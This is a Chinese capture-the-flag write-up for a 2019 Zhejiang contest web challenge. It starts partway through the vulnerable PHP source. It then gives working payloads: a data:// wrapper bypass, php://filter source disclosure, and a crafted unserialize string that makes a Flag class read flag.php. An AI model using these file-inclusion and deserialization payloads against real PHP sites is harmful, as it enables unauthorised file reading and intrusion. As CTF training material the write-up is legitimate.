这是浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维的题解
".file_get_contents($text,'r')."
";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
-
首先先过第一个 if：text 的内容得是 welcome to the zjctf。直接用 data 伪协议（也可以直接用 php://input）绕过：
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
-
然后过第二个 if：
-
提示有 useless.php，直接用 php://filter 读取一下：
&file=php://filter/read=convert.base64-encode/resource=useless.php
-
-
得到 base64：
-
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
-
解码后得到 useless.php 的源码：

<?php
class Flag{ //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
构造序列化。原因：include 的 $file 一旦含有 flag 就会被 preg_match 拦下，但 useless.php 里的 Flag 类在 __tostring 中会 file_get_contents($this->file)，而题目代码最后 echo 了 unserialize($password) 的结果，所以只要让 file 属性指向 flag.php 即可。注意下面的生成脚本把属性名误写成了 flile，因此输出多了一个属性；最终 payload 用的是修正后的 file 属性。
-
<?php
class Flag{ //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
$a = new Flag();
$a -> flile = 'flag.php';
echo(serialize($a));
?>
O:4:"Flag":2:{s:4:"file";N;s:5:"flile";s:8:"flag.php";}
-
/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
-